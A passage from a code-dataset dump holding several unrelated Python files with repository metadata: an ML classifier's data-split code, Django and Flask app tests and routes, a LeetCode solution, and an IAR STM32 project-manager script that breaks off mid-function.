        chosen_classes = np.random.choice(self._n_classes, self.config.n_classes(), replace=False) \
            if self.config.n_classes() is not None \
            else np.arange(self._n_classes)
        self.__chosen_classes = chosen_classes

    def _split_train_test(self, loader: PathMinerLoader, fold_ind: Union[int, Tuple[int, int]], pad: bool = False) \
            -> Tuple[PathMinerDataset, PathMinerDataset]:
        """
        Creates train and test datasets. The type of the experiment (regular, context, time) is controlled by the config
        passed to the Classifier object at the initialization step. Fold index is used to tell which part of data to
        use for testing (selected fold in cross-validation, test slice for 'time', or test subset of code snippets for
        'context').
        :param loader: data loader
        :param fold_ind: part of data used for testing (number in case of cross-validation or 'context', two numbers for 'time')
        :param pad: whether to pad data (used for preparing tensors for the Neural Network model)
        :return: a tuple of training and testing datasets
        """
        chosen_classes = self.__chosen_classes
        if self.config.mode() == 'time':
            train_fold, test_fold = fold_ind
            train_indices = self._loader.time_buckets() == train_fold
            test_indices = self._loader.time_buckets() == test_fold
        elif self.config.mode() == 'context':
            train_indices = self._loader.context_indices(fold_ind) == PickType.TRAIN
            test_indices = self._loader.context_indices(fold_ind) == PickType.TEST
        else:
            test_size = self.config.test_size()
            if isinstance(test_size, int):
                start_ind = fold_ind * test_size
                train_indices = np.concatenate([
                    np.concatenate((inds[:min(inds.size, start_ind)], inds[min(inds.size, start_ind + test_size):]))
                    for inds in self.__indices_per_class[chosen_classes]
                ])
                test_indices = np.concatenate([
                    inds[min(inds.size, start_ind):min(inds.size, start_ind + test_size)]
                    for inds in self.__indices_per_class[chosen_classes]
                ])
            else:
                train_indices = np.concatenate([
                    np.concatenate((inds[:ceil(test_size * inds.size) * fold_ind],
                                    inds[min(inds.size, ceil(test_size * inds.size) * (fold_ind + 1)):]))
                    for inds in self.__indices_per_class[chosen_classes]
                ])
                test_indices = np.concatenate([
                    inds[
                        ceil(test_size * inds.size) * fold_ind:min(inds.size, ceil(test_size * inds.size) * (fold_ind + 1))]
                    for inds in self.__indices_per_class[chosen_classes]
                ])
            train_indices = np.array(train_indices, dtype=np.int32)
            test_indices = np.array(test_indices, dtype=np.int32)
        return self._create_datasets(loader, train_indices, test_indices, pad)

    def _create_datasets(self, loader, train_indices, test_indices, pad) -> Tuple[PathMinerDataset, PathMinerDataset]:
        """
        :return: datasets for training and testing
        """
        return PathMinerDataset.from_loader(loader, train_indices, pad), \
            PathMinerDataset.from_loader(loader, test_indices, pad)

    def cross_validation_folds(self) -> List[int]:
        """
        :return: a list of fold indices depending on the test size passed in config
        """
        test_size = self.config.test_size()
        if isinstance(test_size, float):
            return list(range(int(np.ceil(1. / test_size))))
        else:
            return list(range((int(np.ceil(max([inds.size for inds in self.__indices_per_class]) / test_size)))))
```
- avg_line_length: 47.845714; max_line_length: 128; alphanum_fraction: 0.651618
- the 41 `*_quality_signal` columns, in schema order: 1026, 8373, 5.087719, 0.208577, 0.024521, 0.034483, 0.021839, 0.2341, 0.222605, 0.200383, 0.180843, 0.146552, 0.146552, 0, 0.002393, 0.251403, 8373, 174, 129, 48.12069, 0.830408, 0.203272, 0, 0.151261, 0, 0, 0.016152, 0, 0, 0, 0, 0, 0, 1, 0.067227, false, 0, 0.092437, 0, 0.218487, 0.008403
- the plain qsc_* columns: all 0, except qsc_code_frac_words_unique and qsc_code_frac_lines_string_concat, which are null
- effective: 1; hits: 0
---

- hexsha: a5734519608276ff9f8fee5a5bd77871ef93780f
- size: 4,461; ext: py; lang: Python
- max_stars: tests/test_renderers.py in adamchainz/classy-django-rest-framework @ 19f57d88d13f5ddd2ee33a3239c51e97829e5e6f; licenses ["MIT"]; count null; star events null
- max_issues / max_forks: same path/repo/head; licenses ["MIT"]; counts and event dates null
- content:
```python
import unittest

from mock import mock_open, patch
from rest_framework.generics import ListAPIView

from rest_framework_ccbv.renderers import (
    BasePageRenderer, IndexPageRenderer, LandPageRenderer, ErrorPageRenderer,
    SitemapRenderer, DetailPageRenderer,
)
from rest_framework_ccbv.config import VERSION
from rest_framework_ccbv.inspector import Attributes

KLASS_FILE_CONTENT = (
    '{"2.2": {"rest_framework.generics": ["RetrieveDestroyAPIView", "ListAPIView"]},'
    '"%s": {"rest_framework.generics": ["RetrieveDestroyAPIView", "ListAPIView"]}}' % VERSION
)


class TestBasePageRenderer(unittest.TestCase):
    def setUp(self):
        self.renderer = BasePageRenderer([ListAPIView])
        self.renderer.template_name = 'base.html'

    @patch('rest_framework_ccbv.renderers.BasePageRenderer.get_context', return_value={'foo': 'bar'})
    @patch('rest_framework_ccbv.renderers.templateEnv.get_template')
    @patch('rest_framework_ccbv.renderers.open', new_callable=mock_open)
    def test_render(self, mock_open, get_template_mock, get_context_mock):
        self.renderer.render('foo')
        mock_open.assert_called_once_with('foo', 'w')
        handle = mock_open()
        handle.write.assert_called_once()
        get_template_mock.assert_called_with('base.html')
        get_template_mock.return_value.render.assert_called_with({'foo': 'bar'})

    @patch('rest_framework_ccbv.renderers.templateEnv.get_template')
    @patch('rest_framework_ccbv.renderers.open', mock_open())
    def test_context(self, get_template_mock):
        self.renderer.render('foo')
        context = get_template_mock.return_value.render.call_args_list[0][0][0]
        assert context['version_prefix'] == 'Django REST Framework'
        assert context['version']
        assert context['versions']
        assert context['other_versions']
        assert context['klasses'] == [ListAPIView]


class TestStaticPagesRenderered(unittest.TestCase):
    def setUp(self):
        self.rendererIndex = IndexPageRenderer([ListAPIView])
        self.rendererLandPage = LandPageRenderer([ListAPIView])
        self.rendererErrorPage = ErrorPageRenderer([ListAPIView])

    @patch('rest_framework_ccbv.renderers.templateEnv.get_template')
    @patch('rest_framework_ccbv.renderers.open', mock_open())
    def test_template_name(self, get_template_mock):
        self.rendererIndex.render('foo')
        get_template_mock.assert_called_with('index.html')
        self.rendererLandPage.render('foo')
        get_template_mock.assert_called_with('home.html')
        self.rendererErrorPage.render('foo')
        get_template_mock.assert_called_with('error.html')


class TestSitemapRenderer(unittest.TestCase):
    def setUp(self):
        self.renderer = SitemapRenderer([ListAPIView])

    @patch('rest_framework_ccbv.renderers.templateEnv.get_template')
    @patch('rest_framework_ccbv.renderers.open', mock_open(read_data='{}'))
    def test_context(self, get_template_mock):
        self.renderer.render('foo')
        context = get_template_mock.return_value.render.call_args_list[0][0][0]
        assert context['latest_version']
        assert context['base_url']
        assert context['klasses'] == {}


class TestDetailPageRenderer(unittest.TestCase):
    # @patch('rest_framework_ccbv.renderers.open', mock_open(read_data='{}'))
    def setUp(self):
        self.renderer = DetailPageRenderer(
            [ListAPIView], ListAPIView.__name__, ListAPIView.__module__)

    @patch('rest_framework_ccbv.renderers.templateEnv.get_template')
    @patch('rest_framework_ccbv.renderers.open', mock_open(read_data=KLASS_FILE_CONTENT))
    @patch('rest_framework_ccbv.inspector.open', mock_open(read_data=KLASS_FILE_CONTENT))
    def test_context(self, get_template_mock):
        self.renderer.render('foo')
        context = get_template_mock.return_value.render.call_args_list[0][0][0]
        assert context['other_versions'] == ['2.2']
        assert context['name'] == ListAPIView.__name__
        assert isinstance(context['ancestors'], (list, tuple))
        assert isinstance(context['direct_ancestors'], (list, tuple))
        assert isinstance(context['attributes'], Attributes)
        assert isinstance(context['methods'], Attributes)
        assert context['this_klass'] == ListAPIView
        assert isinstance(context['children'], list)
        assert context['this_module'] == ListAPIView.__module__
        assert isinstance(context['unavailable_methods'], set)
```
- avg_line_length: 44.61; max_line_length: 101; alphanum_fraction: 0.726743
- the 41 `*_quality_signal` columns, in schema order: 498, 4461, 6.210843, 0.178715, 0.084061, 0.087941, 0.109279, 0.511801, 0.444552, 0.387326, 0.361461, 0.305852, 0.305852, 0, 0.003438, 0.152432, 4461, 99, 102, 45.060606, 0.814599, 0.015916, 0, 0.256098, 0, 0, 0.224476, 0.145397, 0, 0, 0, 0, 0.304878, 1, 0.109756, false, 0, 0.073171, 0, 0.231707, 0
- the plain qsc_* columns: all 0, except qsc_code_frac_words_unique and qsc_code_frac_lines_string_concat, which are null
- effective: 1; hits: 0
---

- hexsha: a57349956429b4d3071a79222d869b969895aec7
- size: 1,320; ext: py; lang: Python
- max_stars: emailpal/tests/test_views.py in 18F/django-email-pal @ 7471342741d814d19713d4353a3f566e490177a4; licenses ["CC0-1.0"]; count 5; star events 2017-05-25T00:51:55.000Z to 2020-06-13T16:37:42.000Z
- max_issues: same path/repo/head; licenses ["CC0-1.0"]; count 30; issue events 2017-05-25T00:41:45.000Z to 2017-09-15T23:27:45.000Z
- max_forks: same path/repo/head; licenses ["CC0-1.0"]; count 2; fork events 2017-05-25T17:30:30.000Z to 2021-02-14T11:32:33.000Z
- content:
```python
import pytest
from django.conf.urls import include, url
from django.test import Client, override_settings

from .util import all_template_engines
from .test_sendable_email import MY_SENDABLE_EMAIL

urlpatterns = [
    url(r'^examples/', include('emailpal.urls')),
]


@pytest.fixture
def client():
    with override_settings(SENDABLE_EMAILS=[MY_SENDABLE_EMAIL],
                           ROOT_URLCONF=__name__):
        yield Client()


@pytest.mark.parametrize('template_engine', all_template_engines())
def test_index_works(client, template_engine):
    with template_engine.enable():
        response = client.get('/examples/')
        assert response.status_code == 200
        assert 'MySendableEmail' in response.content.decode('utf-8')


def test_invalid_example_raises_404(client):
    response = client.get('/examples/blarg.html')
    assert response.status_code == 404


def test_valid_html_example_works(client):
    response = client.get('/examples/{}.html'.format(MY_SENDABLE_EMAIL))
    assert response.status_code == 200
    assert 'I am HTML' in response.content.decode('utf-8')


def test_valid_plaintext_example_works(client):
    response = client.get('/examples/{}.txt'.format(MY_SENDABLE_EMAIL))
    assert response.status_code == 200
    assert 'I am plaintext' in response.content.decode('utf-8')
```
- avg_line_length: 31.428571; max_line_length: 72; alphanum_fraction: 0.731818
- the 41 `*_quality_signal` columns, in schema order: 170, 1320, 5.429412, 0.358824, 0.070423, 0.065005, 0.108342, 0.388949, 0.355363, 0.290358, 0.197183, 0.12351, 0.12351, 0, 0.016144, 0.155303, 1320, 41, 73, 32.195122, 0.811659, 0, 0, 0.1, 0, 0, 0.116667, 0, 0, 0, 0, 0, 0.233333, 1, 0.166667, false, 0, 0.166667, 0, 0.333333, 0
- the plain qsc_* columns: all 0, except qsc_code_frac_words_unique and qsc_code_frac_lines_string_concat, which are null
- effective: 1; hits: 0
---

- hexsha: a57546dcf10db7ae680036449e4ff2d0de0b36d3
- size: 2,328; ext: py; lang: Python
- max_stars: employee-management/app.py in desitomato/flask-docker @ 03dadddfbda478180554f3364e91af41b72dce87; licenses ["MIT"]; count null; star events null
- max_issues / max_forks: same path/repo/head; licenses ["MIT"]; counts and event dates null
- content:
```python
import os

from flask import Flask, request, jsonify
from flask_restful import Api

from resources.company import Company, Companylist
from resources.employee import Employee, EmployeeList
from db import db
from resources.user import UserRegister, UserLogin, UserLogout

app = Flask(__name__)
app.config['SQLALCHEMY_DATABASE_URI'] = os.environ.get('DATABASE_URL', 'sqlite:///data.db')
app.config['SQLALCHEMY_TRACK_MODIFICATIONS'] = False
app.secret_key = 'prateek'
api = Api(app)


@app.before_first_request
def create_tables():
    db.create_all()


api.add_resource(Company, '/company/<string:name>')
api.add_resource(Companylist, '/company')
api.add_resource(Employee, '/employee/<string:name>')
api.add_resource(EmployeeList, '/employee')
api.add_resource(UserRegister, '/register')
api.add_resource(UserLogin, '/login')
api.add_resource(UserLogout, '/logout/<string:username>')

if __name__ == '__main__':
    db.init_app(app)
    app.run(port=5000, debug=True)

# API's without flask_restful
""" companies = [{
    'name': 'samsung',
    'employees': [{
        'name': 'prateek',
        'salary': 10000
    }]
}]


@app.route('/company', methods=['POST'])
def create_company():
    request_data = request.get_json()
    new_company = {'name': request_data['name'],
                   'employees': []
                   }
    companies.append(new_company)
    return jsonify(new_company), 201


@app.route('/company/<string:name>')
def get_company(name):
    for company in companies:
        if company['name'] == name:
            return jsonify(company), 200


@app.route('/company')
def get_company_list():
    return jsonify(companies), 200


@app.route('/company/<string:name>/employee', methods=['POST'])
def create_employee_in_company(name):
    request_data = request.get_json()
    print(request_data)
    for company in companies:
        if company['name'] == name:
            new_employee = {
                'name': request_data['name'],
                'salary': request_data['salary']
            }
            company['employees'].append(new_employee)
            return jsonify(new_employee), 201


@app.route('/company/<string:name>/employee')
def get_employee_in_company(name):
    for company in companies:
        if company['name'] == name:
            return jsonify(company['employees']), 200 """
```
- avg_line_length: 25.582418; max_line_length: 91; alphanum_fraction: 0.668814
- the 41 `*_quality_signal` columns, in schema order: 278, 2328, 5.399281, 0.273381, 0.027981, 0.06529, 0.041972, 0.247169, 0.181879, 0.117255, 0.117255, 0.091939, 0.091939, 0, 0.012678, 0.186856, 2328, 90, 92, 25.866667, 0.780243, 0.011598, 0, 0, 0, 0, 0.203476, 0.125767, 0, 0, 0, 0, 0, 1, 0.04, false, 0, 0.28, 0, 0.32, 0
- the plain qsc_* columns: all 0, except qsc_code_frac_words_unique and qsc_code_frac_lines_string_concat, which are null
- effective: 1; hits: 0
---

- hexsha: a57859ecd89b9b31c6238458c1c3953448a728df
- size: 1,234; ext: py; lang: Python
- max_stars: leetcode/31.py in sputnikW/algorithm @ 2c9412d7fc4fdb7f71c31ee3310833014272f0c9; licenses ["MIT"]; count null; star events null
- max_issues / max_forks: same path/repo/head; licenses ["MIT"]; counts and event dates null
- content:
```python
from typing import List


class Solution:
    def nextPermutation(self, nums: List[int]) -> None:
        """
        Do not return anything, modify nums in-place instead.
        """
        lenNums = len(nums)
        if lenNums == 1:
            return

        maxFromTail = -1
        for i in range(lenNums - 2, -1, -1):
            maxFromTail = max(nums[i + 1], maxFromTail)
            if nums[i] < maxFromTail:
                # find the closest number in the end of array from right to left
                indexOfminDelta = -1
                for j in range(lenNums - 1, i, -1):
                    if nums[j] - nums[i] > 0:
                        indexOfminDelta = j
                        break
                # swap curr number with the closest number
                temp = nums[indexOfminDelta]
                nums[indexOfminDelta] = nums[i]
                nums[i] = temp
                # reverse the right part asc in-place
                k, l = i + 1, lenNums - 1
                while k < l:
                    temp = nums[k]
                    nums[k] = nums[l]
                    nums[l] = temp
                    k += 1
                    l -= 1
                return

        nums.reverse()
        return


"""
T=O(N)
"""
```
- avg_line_length: 30.097561; max_line_length: 80; alphanum_fraction: 0.423015
- the 41 `*_quality_signal` columns, in schema order: 131, 1234, 3.984733, 0.419847, 0.047893, 0.05364, 0, 0, 0, 0, 0, 0, 0, 0, 0.022082, 0.486224, 1234, 41, 81, 30.097561, 0.801262, 0.157212, 0, 0.111111, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 0.037037, false, 0, 0, 0, 0.185185, 0
- the plain qsc_* columns: all 0, except qsc_code_frac_words_unique and qsc_code_frac_lines_string_concat, which are null
- effective: 1; hits: 0
---

- hexsha: a57e42b92567d730da83f49a7ddb9cffb40477e6
- size: 28,338; ext: py; lang: Python
- max_stars: ipm.py in AVilezhaninov/STM32_IAR_ProjectManager @ 906c34c70715d5ceec4937fb8d9705318017b3e9; licenses ["MIT"]; count null; star events null
- max_issues: same path/repo/head; licenses ["MIT"]; count 4; issue events 2017-03-10T13:06:46.000Z to 2017-03-10T13:24:00.000Z
- max_forks: same path/repo/head; licenses ["MIT"]; count null; fork events null
- content:
#!/usr/bin/python3
# MIT License
# Copyright (c) 2017 Aleksey Vilezhaninov
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
# The above copyright notice and this permission notice shall be included in all
# copies or substantial portions of the Software.
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
import argparse
import os
import sys
import shutil
from lxml import etree
# ------------------------------------------------------------------------------
# Help messages ----------------------------------------------------------------
# ------------------------------------------------------------------------------
MAIN_HELP_MESSAGE = '''
IPM - IAR Embedded Workbench project manager for STM32F M0, M3, M4, M7 MCU.
Program capabilities:
- create new project with standart ST CMSIS files;
- add folder struct to existing project;
- clean EWARM workspace folder;
- rename existing workspace and project;
usage: ipm <command> <args> [-h | --help]
commands:
create Create new project
add_folder Copy folder to project and add folder to project file
clean Clean workspace folder
rename_workspace Rename workspace
rename_project Rename project
rename Rename both workspace and project
For details use: ipm <command> -h
IPM v0.1 Copyright (c) 2017 Aleksey Vilezhaninov a.vilezhaninov@gmail.com
'''
CREATE_HELP_MESSAGE = '''
Create new IAR EWARM project with specified name and device.
usage: ipm create <name> <device> [-h | --help]
parameters:
-n, --name <name> New project name
-d, --device <device> New project device
Device must be specified as in "CMSIS/Device/ST/STM32Fxxx/Include/stm32fxxx.h".
For usage - download IPM executable file, IPM "template" folder and
standart ST CMSIS folder in the same folder and run program.
'''
ADD_FOLDER_HELP_MESSAGE = '''
Copy folder to project source directory and ddd folder to project file.
usage: ipm add_folder <project_path> <folder_path> [ignore] [-h | --help]
parameters:
-p, --project_path <path> Project path
-f, --folder_path <path> Folder path
-i, --ignore <ignore> Ignore file extentions
For usage - just specify project path, folder to add path and ignore
extentions devided with "/" char (for example "-i c/h/cpp/icf/").
'''
CLEAN_HELP_MESSAGE = '''
Clean workspace folder - delete all files and folders except *.eww and *.ewp.
usage: ipm clean <workspace_path> [-h | --help]
parameters:
-w, --workspace_path <path> Workspace path
For usage - just specify workspace path.
'''
RENAME_WORKSPACE_HELP_MESSAGE = '''
Rename workspace with specified name.
usage: ipm rename_workspace <workspace_path> <name> [-h | --help]
parameters:
-w, --workspace_path <path> Workspace path
-n, --name <name> New workspace name
For usage - just specify workspace path and new workspace name.
'''
RENAME_PROJECT_HELP_MESSAGE = '''
Rename project with specified name.
usage: ipm rename_project <project_path> <workspace_path> <name> [-h | --help]
parameters:
-p, --project_path <path> Project path
-w, --workspace_path <path> Workspace path
-n, --name <name> New project name
For usage - just specify project path, workspace containing this project path
and new project name.
'''
RENAME_HELP_MESSAGE = '''
Rename both workspace and project with specified name.
usage: ipm rename <project_path> <workspace_path> <name> [-h | --help]
parameters:
-p, --project_path <path> Project path
-w, --workspace_path <path> Workspace path
-n, --name <name> New project name
For usage - just specify project path, workspace containing this project path
and new project name.
'''
# ------------------------------------------------------------------------------
# Argparser configuration
# ------------------------------------------------------------------------------
def CreateArgParser():
# Parser config ------------------------------------------------------------
parser = argparse.ArgumentParser(add_help = False)
parser.add_argument("-h", "--help", action = "store_const", const = True)
subparsers = parser.add_subparsers(dest = "command")
# Create command -----------------------------------------------------------
create_parser = subparsers.add_parser("create", add_help = False)
create_parser.add_argument("-n", "--name", help = "New project name")
create_parser.add_argument("-d", "--device", help = "New project device")
create_parser.add_argument("-h", "--help", help = "Help",
action = "store_const", const = True)
# Add folder command -------------------------------------------------------
add_folder_parser = subparsers.add_parser("add_folder", add_help = False)
add_folder_parser.add_argument("-p", "--project_path",
help = "Project path")
add_folder_parser.add_argument("-f", "--folder_path",
help = "Folder path")
add_folder_parser.add_argument("-i", "--ignore",
help = "Ignore extentions")
add_folder_parser.add_argument("-h", "--help", help = "Help",
action = "store_const", const = True)
# Clean command ------------------------------------------------------------
clean_parser = subparsers.add_parser("clean", add_help = False)
clean_parser.add_argument("-w", "--workspace_path", help = "Workspace path")
clean_parser.add_argument("-h", "--help", help = "Help",
action = "store_const", const = True)
# Rename workspace command -------------------------------------------------
rename_workspace_parser = subparsers.add_parser("rename_workspace",
add_help = False)
rename_workspace_parser.add_argument("-w", "--workspace_path",
help = "Workspace path")
rename_workspace_parser.add_argument("-n", "--name",
help = "New workspace name")
rename_workspace_parser.add_argument("-h", "--help", help = "Help",
action = "store_const", const = True)
# Rename project command ---------------------------------------------------
rename_project_parser = subparsers.add_parser("rename_project",
add_help = False)
rename_project_parser.add_argument("-p", "--project_path",
help = "Project path")
rename_project_parser.add_argument("-w", "--workspace_path",
help = "Workspace path")
rename_project_parser.add_argument("-n", "--name",
help = "New project name")
rename_project_parser.add_argument("-h", "--help", help = "Help",
action = "store_const", const = True)
# Rename command -----------------------------------------------------------
rename_parser = subparsers.add_parser("rename", add_help = False)
rename_parser.add_argument("-p", "--project_path",
help = "Project path")
rename_parser.add_argument("-w", "--workspace_path",
help = "Workspace path")
rename_parser.add_argument("-n", "--name",
help = "New project and workspace name")
rename_parser.add_argument("-h", "--help", help = "Help",
action = "store_const", const = True)
return parser
# ------------------------------------------------------------------------------
# Create new IAR EWARM project with specified name and device
# ------------------------------------------------------------------------------
def Create(project_name, project_device):
if not os.path.exists(project_name):
if project_device.lower()[0:6] == "stm32f":
# Copy source files and folders
CopyEWARMFiles(project_name)
CopyCMSISFiles(project_name, project_device)
ChangeProjectFile(project_name, project_device)
# Create user folders
MakeDir(project_name + "/source/user/inc")
MakeDir(project_name + "/source/user/src")
# Copy main.c to project source folder
shutil.copy2("./template/template_main.c",
project_name + "/source")
text_to_replace = '#include "stm32f4xx.h"'
replace_text = '#include "stm32f' + project_device[6] + 'xx.h"'
ReplaceTextInFile(project_name + "/source/template_main.c",
text_to_replace, replace_text)
# Rename template_main.c
rename_path = project_name + "/source"
try:
os.rename(rename_path + "/template_main.c",
rename_path + "/main.c")
except OSError:
Exit("Can not rename \"" + rename_path +
"/template_main.c\" file")
else:
Exit("Undefined device")
else:
Exit("\"" + project_name + "\" folder already exists")
# Copy and rename EWARM workspace and project template files
def CopyEWARMFiles(project_name):
if os.path.exists("template"):
# Create EWARM folder
MakeDir(project_name + "/EWARM")
# Copy template files
src = "template/template.eww"
dst = project_name + "/EWARM"
CopyFile(src, dst)
src = "template/template.ewp"
dst = project_name + "/EWARM"
CopyFile(src, dst)
# Rename template files in EWARM folder
project_file = project_name + "/EWARM/template.ewp"
workspace_file = project_name + "/EWARM/template.eww"
RenameProject(project_file, workspace_file, project_name)
RenameWorkspace(workspace_file, project_name)
else:
Exit("Can not find \"template\" folder")
# Copy CMSIS files in project CMSIS folder
def CopyCMSISFiles(project_name, project_device):
device = project_device.lower()
device_family = project_device[0:7].upper() + "xx"
if os.path.exists("CMSIS"):
# Copy ./CMSIS/Include folder with all files
src = "CMSIS/Include"
dst = project_name + "/source/CMSIS/Include"
CopyTree(src, dst)
# Copy CMSIS"s files and create folders
directory = project_name + "/source/CMSIS/Lib/ARM"
MakeDir(directory)
directory = project_name + "/source/CMSIS/Device/ST/"
directory += device_family + "/Include"
MakeDir(directory)
directory = project_name + "/source/CMSIS/Device/ST/"
directory += device_family + "/Source/iar/linker"
MakeDir(directory)
src = "CMSIS/Device/ST/" + device_family
src += "/Include/" + device_family.lower() + ".h"
dst = project_name + "/source/CMSIS/Device/ST/"
dst += device_family + "/Include"
CopyFile(src, dst)
src = "CMSIS/Device/ST/" + device_family
src += "/Include/" + device + ".h"
dst = project_name + "/source/CMSIS/Device/ST/"
dst += device_family + "/Include"
CopyFile(src, dst)
src = "CMSIS/Device/ST/" + device_family
src += "/Include/system_" + device_family.lower() + ".h"
dst = project_name + "/source/CMSIS/Device/ST/"
dst += device_family + "/Include"
CopyFile(src, dst)
src = "CMSIS/Device/ST/" + device_family
src += "/Source/Templates/" + "system_" + device_family.lower() + ".c"
dst = project_name + "/source/CMSIS/Device/ST/"
dst += device_family + "/Source"
CopyFile(src, dst)
src = "CMSIS/Device/ST/" + device_family
src += "/Source/Templates/iar/" + "startup_" + device + ".s"
dst = project_name + "/source/CMSIS/Device/ST/"
dst += device_family + "/Source/iar"
CopyFile(src, dst)
src = "CMSIS/Device/ST/" + device_family
src += "/Source/Templates/iar/linker/" + device + "_flash.icf"
dst = project_name + "/source/CMSIS/Device/ST/"
dst += device_family + "/Source/iar/linker"
CopyFile(src, dst)
else:
Exit("Can not find \"CMSIS\" folder")
# Change template lines in project file
def ChangeProjectFile(project_name, device):
device = device.lower()
device_family = device[0:7].upper() + "xx"
# Define project file path
project_file = project_name + "/EWARM/" + project_name + ".ewp"
# Define path to CMSIS device family folder
CMSIS_ST_template_path = "$PROJ_DIR$\..\source\CMSIS\Device\ST\STM32F4xx"
CMSIS_ST_path = "$PROJ_DIR$\..\source\CMSIS\Device\ST\\" + device_family
    # Replace device definition
text_to_replace = "STM32F407xx"
replace_text = device.upper()[0:9] + device.lower()[9:]
ReplaceTextInFile(project_file, text_to_replace, replace_text)
# Replace CMSIS include path
text_to_replace = CMSIS_ST_template_path + "\Include"
replace_text = CMSIS_ST_path + "\Include"
ReplaceTextInFile(project_file, text_to_replace, replace_text)
# Replace linker path
text_to_replace = CMSIS_ST_template_path
text_to_replace += "\Source\iar\linker\stm32f407xx_flash.icf"
replace_text = CMSIS_ST_path
replace_text += "\Source\iar\linker\\" + device + "_flash.icf"
ReplaceTextInFile(project_file, text_to_replace, replace_text)
    # Replace folder and file paths
text_to_replace = "<name>STM32F4xx</name>"
replace_text = "<name>" + device_family + "</name>"
ReplaceTextInFile(project_file, text_to_replace, replace_text)
text_to_replace = CMSIS_ST_template_path + "\Include\stm32f407xx.h"
replace_text = CMSIS_ST_path + "\Include\\" + device + ".h"
ReplaceTextInFile(project_file, text_to_replace, replace_text)
text_to_replace = CMSIS_ST_template_path + "\Include\stm32f4xx.h"
replace_text = CMSIS_ST_path + "\Include\\" + device_family.lower() + ".h"
ReplaceTextInFile(project_file, text_to_replace, replace_text)
text_to_replace = CMSIS_ST_template_path + "\Include\system_stm32f4xx.h"
replace_text = CMSIS_ST_path + "\Include\system_"
replace_text += device_family.lower() + ".h"
ReplaceTextInFile(project_file, text_to_replace, replace_text)
text_to_replace = CMSIS_ST_template_path
text_to_replace += "\Source\iar\linker\stm32f412rx_flash.icf"
replace_text = CMSIS_ST_path +"\Source\iar\linker\\" + device + "_flash.icf"
ReplaceTextInFile(project_file, text_to_replace, replace_text)
text_to_replace = CMSIS_ST_template_path
text_to_replace += "\Source\iar\startup_stm32f407xx.s"
replace_text = CMSIS_ST_path + "\Source\iar\startup_" + device + ".s"
ReplaceTextInFile(project_file, text_to_replace, replace_text)
text_to_replace = CMSIS_ST_template_path + "\Source\system_stm32f4xx.c"
replace_text = CMSIS_ST_path + "\Source\system_" + device_family + ".c"
ReplaceTextInFile(project_file, text_to_replace, replace_text)
# Define device core file
device_f_series = device[6]
if device_f_series == "0":
device_core = "core_cm0.h"
elif device_f_series == "1" or device_f_series == "2":
device_core = "core_cm3.h"
elif device_f_series == "3" or device_f_series == "4":
device_core = "core_cm4.h"
elif device_f_series == "7":
device_core = "core_cm7.h"
else:
Exit("Can not define device core")
text_to_replace = "$PROJ_DIR$\..\source\CMSIS\Include\core_cm4.h"
replace_text = "$PROJ_DIR$\..\source\CMSIS\Include\\" + device_core
ReplaceTextInFile(project_file, text_to_replace, replace_text)
# Replace output .hex and .out files name
ReplaceTextInFile(project_file, "template.hex", project_name + ".hex")
ReplaceTextInFile(project_file, "tempalte.out", project_name + ".out")
# ------------------------------------------------------------------------------
# Copy a folder into the project source directory and add it to the project file
# ------------------------------------------------------------------------------
def AddFolder(project_path, folder_path, ignore_list):
if os.path.isfile(project_path):
if project_path.endswith(".ewp"):
if os.path.exists(folder_path):
# Copy folder to project
folder_path = DecoratePath(folder_path)
src = folder_path
dst = "/".join(project_path.split("/")[0:-2])
dst += "/source/" + src.split("/")[-1]
if os.path.exists(dst):
Exit("Folder \"" + dst + "\" exists")
CopyTree(src, dst)
# Add folder struct in project file
tree = etree.parse(project_path)
root = tree.getroot()
start_path_pos = len(folder_path.split("/")) - 1
elements = ParseFolder(folder_path, etree.Element("project"),
ignore_list, start_path_pos, True)
for node in elements:
text_node = etree.tostring(node, pretty_print = True)
root.append(etree.XML(text_node))
xml_file = open(project_path, "wb")
xml_file.write(etree.tostring(root, pretty_print = True,
encoding = "iso-8859-1", xml_declaration = True))
xml_file.close()
else:
Exit("Can not find \"" + folder_path + "\" folder")
else:
Exit("\"" + project_path + "\" is not *.ewp file")
else:
Exit("Can not find: \"" + project_path + "\" file")
# Parse folder and add its subfolders and files to the XML tree
def ParseFolder(folder_path, parent_node, ignore_list,
start_path_pos, first_entry):
if first_entry:
append_node = AppendNode("group", parent_node,
folder_path.split("/")[-1])
else:
append_node = parent_node
for item in os.listdir(folder_path):
item_path = folder_path + "/" + item
if os.path.isfile(item_path):
path = "$PROJ_DIR$/../source/"
path += "/".join(folder_path.split("/")[start_path_pos:])
path += "/" + item
            if ignore_list is not None:
if not any(item.endswith(x) for x in ignore_list.split("/")):
AppendNode("file", append_node, path)
else:
AppendNode("file", append_node, path)
else:
sub_node = AppendNode("group", append_node, item)
ParseFolder(item_path, sub_node, ignore_list, start_path_pos, False)
return parent_node
# Append node in XML tree
def AppendNode(node_tag, parent_node, node_name):
tag = etree.Element(node_tag)
parent_node.append(tag)
tag_name = etree.Element("name")
tag_name.text = node_name
tag.append(tag_name)
return tag
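# Example (a sketch of the XML this helper builds with the etree module used
# above): AppendNode("group", root, "drivers") appends
#   <group><name>drivers</name></group>
# under root and returns the new <group> element, ready for <file> children.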
# ------------------------------------------------------------------------------
# Clean workspace folder - delete all files and folders except *.eww and *.ewp
# ------------------------------------------------------------------------------
def Clean(workspace_path):
if os.path.isfile(workspace_path):
if workspace_path.endswith(".eww"):
workspace_folder = workspace_path.split("/")[0:-1]
workspace_folder = "/".join(workspace_folder)
for item in os.listdir(workspace_folder):
item_path = workspace_folder + "/" + item
if os.path.isfile(item_path):
if not item.endswith(".eww") and not item.endswith(".ewp"):
try:
